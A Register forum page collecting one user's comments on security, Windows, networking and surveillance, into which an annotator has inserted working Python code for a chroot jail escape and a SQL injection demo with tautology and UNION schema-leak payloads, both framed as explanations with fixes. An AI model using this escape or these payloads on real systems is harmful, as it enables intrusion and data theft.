Posts by Christian Berger

4850 publicly visible posts • joined 9 Mar 2007

Soon-to-be Facebook intern wins UK Cyber Security Challenge

Christian Berger

Re: Attack of the sophisticated spearfishing ransomware DDoS attack ..

a) But then they won't be able to use social media.

b) Even if they did, the license key updates would still go over USB which is a huge attack vector.

c) It is very hard to have a usable, yet properly updated Windows system without Internet access. Setting up your own "Windows Mirror" is much harder than setting up your own Debian one. (Although I'm sure Microsoft will sell you an overly expensive version if you are big enough)

Other problems include internal attackers or attacks on business partners, or just general idiocy.

The big problem is that there are people who decided to build infrastructure on the systems which are hardest to defend.

IBM PCjr STRIPPED BARE: We tear down the machine Big Blue would rather you forgot

Christian Berger

Re: Refresh on early PCs

Ahh, that's actually a side effect then which doesn't cost any additional clock cycles.

So the CRT controller "steals" memory access cycles from the main CPU. If you swap some address lines around, you can make sure it'll spread all its data over all pages.

As far as I know an access to a bit on a page also causes that page to be refreshed.

Ohh and the missing DMA controller wasn't too much of a problem back then, as MS-Dos didn't support it very well. All system calls were blocking and there was no multitasking. So even when DMA was used, your program still had to wait for it.

Christian Berger

Refresh on early PCs

Actually those refreshes used to be done in software. You had 3 timers, one was used for sound, the other one as a "systick" (actually at around 19 Hz for the time) and the third one was set at around 100 Hz and started the refresh routine. So roughly 100 times per second your program would stop for a couple of hundred clock cycles. That's far less than one out of 4 memory cycles. Still there was software which would decrease that frequency to give you more cycles for your software at the risk of memory loss.

'Arrogant' Snowden putting lives at risk, says NSA's deputy spyboss

Christian Berger

Why do people invite the NSA to speak?

I mean it's obviously clear that everything you will get is just pure PR on the edge of lying. Plus those people already have more than enough of a platform to speak on. We don't need to help them with their PR.

This changes everything: Microsoft slips WinXP holdouts $100 to buy new Windows 8 PCs

Christian Berger

Actually it changes nothing

those $100 won't make Windows 8 magically compatible with the software running on Windows XP.

Kent Police fined £100k for leaving interview vids of informants in old cop shop

Christian Berger

It's the same as with companies

...but with companies it's the customer who pays.

It's very hard to punish organisations, and money is typically a very inefficient way of doing it.

GFI LanGuard 2014: Go on. Find my weaknesses and point them out

Christian Berger

Re: Other tools

This is a Trevor Pott article, don't expect any insights.

He probably hasn't heard of Nessus or OpenVAS, or couldn't get it to run. It's not like he knows about computers.

Shuttleworth: Firmware is the universal Trojan

Christian Berger

But then we'd need hardware standards

For example the framebuffer mode of every graphics card would need to work identically. We'd need to have just a small set of USB controllers, and all of that needs to be discoverable by the operating system. Otherwise you'd need to port your OS to every system just like you already need to do in the mobile world.

Is no browser safe? Security bods poke holes in Chrome, Safari, IE, Firefox and earn $1m

Christian Berger

Re: Run them in a chroot jail

I think last time I checked, you could simply chroot out of a chroot "jail". I don't think it ever was designed to be a security feature.
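The escape the comment refers to, as an added illustration (this is my example, not code from the comment or from any project on the page): it is the sequence the chroot(2) man page itself documents, mkdir, chroot into the subdirectory without changing directory, then cd .. out of it. It assumes Linux and a process that still holds CAP_SYS_CHROOT (root inside the jail); without that capability the attempt stops with EPERM, which the function reports instead of raising. The jail directory is a throwaway created in the temp dir.

```python
"""Classic chroot(2) escape, as documented in the chroot(2) man page.

Added illustration; not code from the comment or from any project on the page.
Assumes Linux. Run it only as root in a throwaway VM or container.
"""
import errno
import os
import tempfile

# Assumption: no real path is nested deeper than this many directories.
ESCAPE_DEPTH = 64


def _errname(e: OSError) -> str:
    return errno.errorcode.get(e.errno, str(e.errno))


def chroot_breakout() -> str:
    """Enter a throwaway chroot, then escape from it.

    Returns "escaped" when the process is back at the real root, otherwise
    the errno name that stopped the attempt ("EPERM" without CAP_SYS_CHROOT).
    """
    jail = tempfile.mkdtemp(prefix="jail.")
    try:
        # 1. Be "confined": both the root and the cwd are inside the jail.
        os.chdir(jail)
        os.chroot(jail)
    except OSError as e:
        os.chdir("/")
        os.rmdir(jail)
        return _errname(e)

    # 2. The escape. Make a subdirectory and chroot into it WITHOUT chdir.
    #    The root moves to jail/escape while the cwd stays at jail, i.e.
    #    outside the new root, so ".." is no longer clamped by the root.
    os.mkdir("escape", 0o700)
    try:
        os.chroot("escape")
    except OSError as e:
        return _errname(e)

    # 3. ".." now walks up the real directory tree until it reaches the real
    #    "/", where it stays. Then the real root becomes our root again.
    for _ in range(ESCAPE_DEPTH):
        os.chdir("..")
    os.chroot(".")

    # These absolute paths resolve from the real root: proof we are out.
    os.rmdir(os.path.join(jail, "escape"))
    os.rmdir(jail)
    return "escaped"


if __name__ == "__main__":
    print(chroot_breakout())
```

Run as root in a disposable VM it prints escaped; as an unprivileged user it prints EPERM. That second outcome is what a jail has to arrange for: drop CAP_SYS_CHROOT (and the rest of the capability set) before handing control to the jailed code, or give the process its own mount namespace and use pivot_root(2), which is what container runtimes do instead of relying on chroot(2).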

Christian Berger

Re: We need something more simple than webbrowsers

"That ain't going to happen now that world+dog expect to run javascript/HTML5/etc to display "hello world". The modern web browser is more like an OS than a text rendering application, and so much of the web now depends on that to work. Yes, I know its dumb, but no I don't see it changing."

Yes, but I'm not necessarily talking about "changing the web", but about providing a much more secure and restricted alternative. I mean we (normal people) are not using webmail since it's far too insecure, we use special protocols like IMAPS. We use ssh which even uses key pinning. Both protocols however are inconvenient for GUI tasks over high latency connections. (though there is an alternative to ssh called mosh which can do predictive echoes and stuff)

Imagine we had some trivial "GUI over IP" protocol which simply uses a GUI toolkit on one side and transmits events. It could run over a severely cut down version of Websocket, and you could even write a client for it which runs in browsers.

With a client in HTML5 you could have a migration strategy to native clients.

Christian Berger

We need something more simple than webbrowsers

Modern web browsers are extremely complex. Not only do they contain support for multiple image and video files, but also complex layout languages and plugins.

Maybe it might make sense to have a much simpler way to display web pages, combined with a simple way to do "web applications". It would need to be so simple you could implement it in a day.

Mozilla takes Windows 8-friendly Firefox out back ... two shots heard

Christian Berger

Re: 1000 Users!

Yes, and if you correlate that to other numbers published here

http://regmedia.co.uk/2014/03/14/statcounter_large.jpg

it means that those 1000 users are probably the roughly 7% of all desktop users running Windows 8... which means that there are about 14 thousand desktop PCs in the world.

Even when we assume only 1% of the Windows 8 users run Firefox, we still only end up at 1.4 million desktop PCs.

Windows hits the skids, Mac OS X on the rise

Christian Berger

How do they count?

If they are counting via Flash or Javascript served by ad-brokers, for example, the results would be totally understandable. Most Linux users, for example, don't execute Javascript from sites they don't trust. It's a security feature.

That also would explain the discrepancy between those numbers and what we are all seeing in the real world.

'Amazon has destroyed the unicorn factory' ... How clouds are making sysadmins extinct

Christian Berger

How I learned the company I'm at was using Amazon services

The company I currently work at has an out-sourced wiki and issue tracker. Recently we have found out that it sends its e-mail via an Amazon e-mail service.

Amazon advertises that service by claiming that those mails will not land in spam filters... which is a problem for people using servers in the Amazon IP-range as it's crowded with spammers.

Well so far so bad, the funny thing is how we found out about that. E-Mail from that issue tracker... which uses Amazon to not be considered as spam, landed in the spam folder. :)

Christian Berger

Re: I'm glad people believe sysadmin skills are becoming extinct

Seriously, compared to what most people have as sysadmins, you _are_ a genius.

Most sysadmins out there have never heard of rsync. They have never used a package manager or scripted something via ssh. Many probably wouldn't even find their way out of vim.

Those are people who live in the Microsoft bubble where people believe they don't need to be able to program, and that somehow it is normal that e-mail is something complex.

NSA's TURBINE robot can pump 'malware into MILLIONS of PCs'

Christian Berger

Re: Paid for subscriptions and text documents sent out over XMPP

"And that would impact packet sniffing how exactly ?"

XMPP supports various ways of end-to-end encryption, so that might be doable... even though I'd count XMPP as one of the more complex protocols.

Christian Berger

It's time for the next step in computer security

After FOSS which already eradicated many intentional backdoors for the people using it, we now need to add simplicity. The less code you have the less likely it is to contain a backdoor.

So we need protocols which can be implemented with as few lines as possible. And we may even need hardware separation so if one of the components gets compromised, it won't be able to compromise the others.

Christian Berger

Re: I invite the US and the other 5 eyes partners...

Well the German case is very well documented. Newspapers even printed commented disassemblies of it. (No I'm not kidding here's the PDF https://www.faz.net/dynamic/download/fas/FAS_09_10_2011_S41_S47_Staatstrojaner.pdf )

How to shop wisely for the IT department of the future

Christian Berger

"The nerds would just spend a lot of time arguing which technology is the best thing to use, whilst not finding out what the business actually requires."

How is that any worse than having a department which regularly chooses the worst solutions, while not finding out what the business actually requires, but just buying what vendors have to sell?

What you need, and this is true for just about any area, is a mixture of smart people with different backgrounds.

Unfortunately the typical quality of human resources is so low even running on a bunch of narrow minded idiots (having exactly the same perspective) still makes you competitive in the short run.

CIA hacked Senate PCs to delete torture reports. And Senator Feinstein is outraged

Christian Berger

Democratic oversight won't work...

....for organisations which can simply sabotage the democratic instances which should control them.

Large organisations tend to have one primary motivation, they want to survive. The NSA knows very well, that as soon as the public gets informed about what they do, and has the power to abandon them, they would do this nearly immediately. Therefore it needs to protect itself in order to survive.

Powerful secret services are not something which is compatible with a democracy.

British Pregnancy Advice Service fined £200k for Anon hack, data protection breaches

Christian Berger

You should put clauses into your contracts...

...which make the provider of IT services responsible for such fines. Then you'd finally get rid of all those "PHP-shops" which have never heard of prepared statements.
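To make the "prepared statements" point concrete, here is an added example (mine, not from the comment, and not from the BPAS case, whose technical details the page does not give): the same lookup written the way the comment criticises, with user input spliced into the query text, and written with a bound parameter. It runs against a small constructed in-memory SQLite table; the table, names and payloads are invented for the demonstration.

```python
"""String-built SQL versus a prepared statement, on a constructed SQLite table.

Added example; not code from the comment or from any site the page discusses.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, email TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.org"),
         ("bob", "bob@example.org"),
         ("carol", "carol@example.org")],
    )
    return db


def lookup_vulnerable(db: sqlite3.Connection, name: str) -> list:
    """The pattern the comment complains about: input becomes query text."""
    sql = "SELECT name, email FROM users WHERE name = '%s'" % name
    return db.execute(sql).fetchall()


def lookup_prepared(db: sqlite3.Connection, name: str) -> list:
    """Prepared statement: the SQL is fixed, the value travels separately,
    so it can never be parsed as SQL."""
    return db.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


# Two classic payloads (constructed). The first turns the WHERE clause into a
# tautology, the second appends a UNION that reads the schema catalogue.
TAUTOLOGY = "x' OR '1'='1"
SCHEMA_LEAK = "' UNION SELECT name, sql FROM sqlite_master --"


if __name__ == "__main__":
    db = make_db()
    for payload in (TAUTOLOGY, SCHEMA_LEAK):
        print("spliced :", lookup_vulnerable(db, payload))
        print("prepared:", lookup_prepared(db, payload))
```

The spliced version returns every user for the first payload and the CREATE TABLE statement for the second; the prepared version returns nothing for either, because the database is asked for a user whose name literally is the payload string. Escaping the input by hand is not the fix; binding it is.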

Who loves office space? Dell does: Virtualization to banish workstations from under desks

Christian Berger

Re: Oddly content free

Well something like MJPEG can work with less than a single frame of latency (<20ms). Even if you don't transmit areas which haven't changed, you won't get higher latency.

Of course you'd want to use specialized algorithms and maybe a slight bit of intra frame predictions, but it's a far cry from the multi-second broadcast quality. You can probably process everything you need with single frame latency.

The downside to this is of course that the encoding is not highly efficient. A 100 MBit connection will however still get you around 10 full frame updates per second (at JPEG 10:1 compression) of a 3840*1080 screen. Considering that typically only a small part of your screen changes, and your network connection is probably gigabit Ethernet (allowing theoretical 100 full frame updates), this will most likely work.

So, yes, this can work on the LAN and with more thought than I put into it for this comment, you can probably even make it run well enough to be practically indistinguishable from local usage.

Christian Berger

Re: Eggs in one basket

Well just like when your fileserver fails. :)

But seriously if you have it in-house, the chance of it failing is pretty low. And once you have an in-house failure, it's likely to be something like power which would knock out your local workstations, too.

This won't work for "the cloud" anyhow, since there you typically don't have the multi-megabit bandwidths you'd need for that.

Christian Berger

Look! It's the 1980s all over again!

Back then many universities had X-Terminals along with normal text-based ones. You could simply go to one of those terminals and log into a larger Unix computer. Alternatively you could log into the Unix workstation somewhere in your office.

Of course eventually local processing became more economical as local workstations became cheaper than X-terminals while networking didn't progress as fast as the rest of computing did.

What we have now is enough power to just do video encoding on the fly. It's trivial to do some sort of H.264 with cutback motion compensation on a graphics card... without slowing it down much for other tasks.

What could make this a booming industry would be standards. With open standards you could just access any server with any device. Just like you could use any X-terminal with just about any unixoid computer.

Linux cloud world's best kept secret DigitalOcean just bagged $37m

Christian Berger

Well it's cheap, but not mind-blowingly cheap

5 bucks for a virtual server, apparently with no Internet connectivity (the article states that they are still working on IP connectivity) has to be seen in comparison to those usual 8 Euro offers found by many companies... which include IP connectivity _and_ phone support.

Bugger the jetpack, where's my 21st-century Psion?

Christian Berger

The problem back then was mostly the software

The typical operating system MS-Dos, while still used well into the 1990s for games and business applications, just wasn't suitable for saving battery power or running on off-standard equipment. There was no reliable way to determine if a program was active or not, so some of those palmtops reduced their clock frequency after every keypress.

Dedicated operating systems had their own limitations, with limited software available and often not even real file systems. Syncing them often meant manipulating badly documented RAM objects directly.

Windows CE wasn't much better, and I remember people having swapped the original Windows CE for DOS and Windows 3.11 on early x86 compatible palmtops.

Back then constant network connectivity also was near unimaginable. Otherwise you could have simply used those devices as terminals.

Today we would almost have the hardware, what's missing now is proper monochrome or transflective displays and of course keyboards. As for the software, just having something PC like would be great. Today that platform is somewhat more flexible than it used to be. That way you could install any OS you'd like.

Dell charges £16 TO INSTALL FIREFOX on PCs – Mozilla is miffed

Christian Berger

What I'd like to have...

...would be a computer with an empty harddisk. As long as consumer PC manufacturers don't do that, I won't buy from them.

Hey, IT department! Sick of vendor shaftings? Why not DO IT, yourself

Christian Berger

Re: Missing the competitive advantage

Actually it doesn't need to be expensive. Treat your IT dev team the right way. Give them decent amounts of money (actually give them what those bad IT guys get), but give them freedom.

Free them from clerical work. Get them an assistant who takes care of company bureaucracy. Give them a small "experimental" budget on which they can try out new technologies.

Then also identify the normal staff members who can program. Include them in technical decisions about your IT. Maybe they can act as a sort of interpreter between the needs of the department and the capabilities of IT.

Christian Berger

It's actually what many businesses do when they switch to Linux

Such switches usually aren't "out with the Windows box, in with the Linux one", but also switches from foreign IT products to self made ones.

One of the problems with doing things that way is that you need people who look at a problem and see the core of it. There's plenty of software developers who, when given a simple task, will add layer upon layer of complexity.

There seems to be a correlation between such skills and people who prefer something unixoid as their operating system. One of the basics of the Unix philosophy is, in fact, the "Rule of Optimization" which states that you should build a prototype first.

http://catb.org/esr/writings/taoup/html/ch01s06.html#rule_of_optimization

In fact your typical unixoid environment comes with lots of useful tools for prototyping. Everything you can do on a tabulator can be done trivially with standard console tools in the time it takes to install even the simplest SQL server. It probably will be slow and buggy, but it's a prototype.

Ethernet boffins get ready to kick off 400G development

Christian Berger

Re: Well, then!

Well yes, but we already have that problem on the Internet right now. You have 100ms latency for intercontinental links and 100 MBit connections (in cheap data-centres or with end users in developed countries like Turkey). So you easily have a megabyte in transit.

Obviously there is a reason for Gigabit Ethernet for consumers. It allows much faster file transfers. Realistically you can pipe 50 Megabytes per second even with consumer equipment. It's relevant if copying your file takes 1 or 5 hours.

Microsoft to get in XP users' faces with one last warning

Christian Berger

They surely will bring out XP 2.0, won't they?

I mean not bringing out a sensible upgrade option which runs on the same hardware, supporting the same software, that would be like betraying their customers. Microsoft is such a big and trusted partner, they would never do that, would they?

Microsoft doesn't care about "Gold Partners" or anything. Those are just marketing terms. All they want is you to give them money. I know that may sound harsh to you, but Microsoft is a commercial company, they need to make money, that's their priority.

If you don't like that game, stop playing it. Don't switch from XP to Windows 8.1, but look into getting replacements for your legacy applications. For those you cannot find replacements for, get an Application server, Wine or a virtualized XP machine with tightly controlled IO.

Get Quake III running on Raspberry Pi using Broadcom's open-source GPU drivers, earn $10K

Christian Berger

Actually using it for graphics is one of the more boring things

Sure, this will enable you to connect LCDs to it since you can finally change the code to support the one you have and all that. That is already a huge step forward.

However for me the more exciting part is that this unleashes the GPUs for general purpose computing. This will allow you to do fairly complex SDRs on that hardware.

Who earns '$7k a month' but can't even legally drink? A tech intern!

Christian Berger

I think it's a good sign that Palantir has to pay that much

It gives me hope that the young and talented still have values and won't just take any job without thinking. It's not easy refusing a $7000/month job when your likely alternative is unemployment.

I think it's great that most of the young people don't want to start at such a company which produces software to justify targeted killings of most likely innocent people. It's a sign that people don't want that. It's a sign that the public is different to those unwashed hordes gathering at NSA sponsored conferences.

Energy firms' security so POOR, insurers REFUSE to take their cash

Christian Berger

Re: Surprise!...People need to give themselves a shake and stop using MS products!

"Unless the SCADA system itself is using Windows as the operating system, or uses Windows to effect day to day control, then you are way off base."

Actually that is the case in most cases today. SCADA uses standards like OPC (OLE for Process Control) which are based on legacy Windows technologies.

Those old legacy systems are probably much less of a problem since they were simple. Unless you are a total idiot and connect your internal bus to the Internet you are not likely to have any problems.

The newer stuff is much more of a problem, since it's not just Windows based, but done by that breed of 1990s Windows programmers we thought had died out with the .com crash. The people who think their C++ compiler does bounds checking, who believe in security through obscurity, who think SQL databases are a great way to store settings for desktop software and who believe in software licensing files which need to be regularly updated. (even though you already bought the hardware which is essential for the software and cost millions)

New radio tech could HALVE mobe operators' bandwidth needs

Christian Berger

Re: So let me ask this then....

Well you can use directional couplers, plus you can actually build one "into your antenna", by making an antenna with the right geometry. Both technologies can bring you about 40dB of separation tops. Maybe you can get into the range where local reflections get relevant.

But it's not going to be much of a revolution.

Boeing going ... GONE: Black phone will SELF-DESTRUCT in 30 secs

Christian Berger

Re: What would you do with a Boeing Black on your lab bench?

The key exchange for ports sounds like a good idea at first, but then we are talking about USB. Long before you can exchange any keys you'll have the USB stack talking to it. If you are lucky, you are using Linux or some BSD, then the amount of security critical bugs is probably low. If you are unlucky they are using some commercial RTOS which nobody ever checked for security issues.

IBM stuffs 64Gbps of traffic down 'low quality' fibres

Christian Berger

Yes, but the optics for multimode fibre can be a lot cheaper. Since the core is larger it's easier to splice it and get light in or out. The extreme case are plastic fibres like the ones used for SPDIF. Those are dirt cheap, that's why they are going to be used in the car industry.

Facebook pays $19bn for WhatsApp. Yep. $45 for YOUR phone book

Christian Berger

It does make sense from multiple aspects

First of all Facebook sees a competitor in WhatsApp. And a simple way to deal with it is to buy it, particularly if you have lots of (virtual) money.

Second it makes sense for the bank selling it, since it means they can turn some of the valuation into actual money without the market collapsing. Think about it, if you have 10% of bubble2-0.com and you want to sell your share on the stock market, the market will collapse and you'll end up with a small fraction of what it's worth. If you can sell it to another .com company, you will get part of your shares in actual money. So you can turn "worthless paper" into other "worthless paper", plus actual money.

Snowden journo boyf grill under anti-terror law was legal, says UK court

Christian Berger

"I think they need to bring in severe penalties for misuse of powers, and by tougher penalties I mean real punishments like lashes, the stocks.."

The point is, as long as the laws are so deliberately vague, not limiting themselves to certain crimes and not defining "Terrorism". You first have to define "proper" use of a law before you can punish "misuse". And that is one of the problems here.

It would be best to get rid of those vague "anti-terrorism" laws. There is virtually no terrorism in western countries, only abuse of those laws.

Angela Merkel: Let US spies keep their internet. The EU will build its own

Christian Berger

Well the problem is Deutsche Telekom here

Most ISPs in Germany peer with each other, so e-mail hardly ever leaves the country....

However Deutsche Telekom rarely peers, which means that packets from one German ISP to Deutsche Telekom can well go through other countries or at least foreign providers.

Obviously this is just some ploy to shift more money to that company. It'll do absolutely nothing against foreign or domestic secret services.

New password system lets planet Earth do the hard work

Christian Berger

How much entropy is there?

I mean you somehow need to get information from the user to the system. It's easy to calculate how much information you can type, it's harder to estimate how many bits you can extract out of that kind of scheme.
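An added example of the comparison the comment asks for (mine, not from the comment, and not from the password system the article describes, whose workings the page does not give): the nominal capacity of a typed secret next to the Shannon entropy and the min-entropy of how users actually choose. The "which place on the map do people pick" distribution is invented purely to show the calculation; the point it illustrates, that the extractable bits are bounded by the most popular choice, not by the size of the input space, holds for any such scheme.

```python
"""Nominal capacity versus extractable entropy of a user-chosen secret.

Added example; the choice distribution is constructed, not measured.
"""
import math
from collections import Counter


def typed_bits(alphabet_size: int, length: int) -> float:
    """Nominal capacity of a typed secret: log2(alphabet_size ** length)."""
    return length * math.log2(alphabet_size)


def shannon_bits(probs) -> float:
    """Average information per secret over the whole user population."""
    return -sum(p * math.log2(p) for p in probs if p > 0)


def min_entropy_bits(probs) -> float:
    """-log2(p_max): resistance against an attacker who tries the most
    popular choice first. This is the figure that matters for guessing."""
    return -math.log2(max(probs))


def entropy_from_samples(samples):
    """Estimate both figures from observed choices (e.g. a user survey)."""
    counts = Counter(samples)
    n = len(samples)
    probs = [c / n for c in counts.values()]
    return shannon_bits(probs), min_entropy_bits(probs)


# Constructed (invented) distribution for a "pick a point on the map" scheme:
# half the users pick their home, a fifth their workplace, a tenth their
# school, and the remaining fifth is spread evenly over 20 minor landmarks.
SKEWED_CHOICES = [0.5, 0.2, 0.1] + [0.01] * 20


if __name__ == "__main__":
    print(f"8 chars from 62 symbols, nominal: {typed_bits(62, 8):.1f} bits")
    print(f"skewed map choices, Shannon:      {shannon_bits(SKEWED_CHOICES):.2f} bits")
    print(f"skewed map choices, min-entropy:  {min_entropy_bits(SKEWED_CHOICES):.2f} bits")
```

With these invented numbers the typed secret nominally carries about 48 bits, the map choice averages under 3 bits, and the first guess ("home") succeeds half the time, i.e. one bit of min-entropy. Whatever the real scheme looks like, that last figure is the one to measure before trusting it.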

Google promises 10Gps fiber network to blast 4K into living rooms

Christian Berger

Re: What's the point?

Well what's relevant today is the uplink speed. And that's the current bottleneck. And there the difference between 1 and 20 MBit is still huge. With 1 MBit you can barely stream SD, with 20 MBit you can stream decent HDTV. Particularly with fast mobile networks getting affordable, having access to your local media is a big deal.

There is a second point. We now still have companies like Google who have the money to invest in the research needed for the next decades. Who knows how long we can still do that kind of research.

We also need to invest in the infrastructure. Our current last mile is still based on copper, a technology which became outdated in the mid 1970s. We desperately need to start a programme replacing it with a dedicated pair of fibres into every home.

Your personal data is worth a measly eight bucks a month

Christian Berger

Re: At least this is honest.

I don't think you understand the idea of copyright. Copyright, in its current form, wasn't made for "people" it was made for corporations. If personal data gets covered by it, it'll be exclusively for corporations.

Christian Berger

Around 14 years ago....

...lots of companies popped up with similar business models. They took over your computer and displayed ads when you were online. You got extra money for clicking on those ads.

Obviously people just installed it on some old box they had lying around and installed software to surf the web and click for them. So what will happen here is that most of the users will be bots.

Plan 9 moves out from Lucent licence space

Christian Berger

Actually there is a port to the Raspberry PI

Google's SECRET contracts: Android lock-in REVEALED!

Christian Berger

Considering Google Play is among the worst things of Android

I don't see how this is a limitation. My Android phone doesn't have Google Play and I've yet to miss it.

SCRAP the TELLY TAX? Ancient BBC Time Lords mull Beeb's future

Christian Berger

Please stop for a moment and look around

The UK is one of the few places on earth where television actually works. Even ITV has some fairly decent programming since there is the BBC trying to make good television without any fear of losing their income. In Germany for example, public TV stopped caring about quality and commercial stations noticed they didn't need to care either.

The UK system works. Sure it has flaws and isn't perfect, but it's better than what the rest of the world has. Please, I beg you, don't throw away what you've got.

¡Viva la Revolution! Geeksphone's new mobe to go on sale this month

Christian Berger

Re: I see problems for operators

People are already messing around with the air interface, you can buy 15 Euro feature phones you can reflash and use as GSM probing devices. The operators don't seem to mind yet.

There are, currently, no holes which would allow you to make free phone calls. What you can do is denial of service, but that's no big deal on a wireless network.

Intel Labs 'geeks' flash Edison kit to El Reg: We do it for the BIRDS

Christian Berger

Re: The paper notebook computer sounds intriguing.

The genius of the SD-Card form factor is that you can both use a plug or solder it directly onto the board.

So cool it 2.4 gigahertz: BATTERY-FREE comms for international band

Christian Berger

Well they got a patent and licenses to sell

The technology itself isn't particularly new or innovative. People have been building "signal powered" transmitters for decades now.

http://www.neazoi.com/technology/voicepassivedsb/MJRainey%20-%20El%20Silbo.htm

http://makezine.com/2009/11/03/build-a-voice-powered-rf-transmitte/

etc.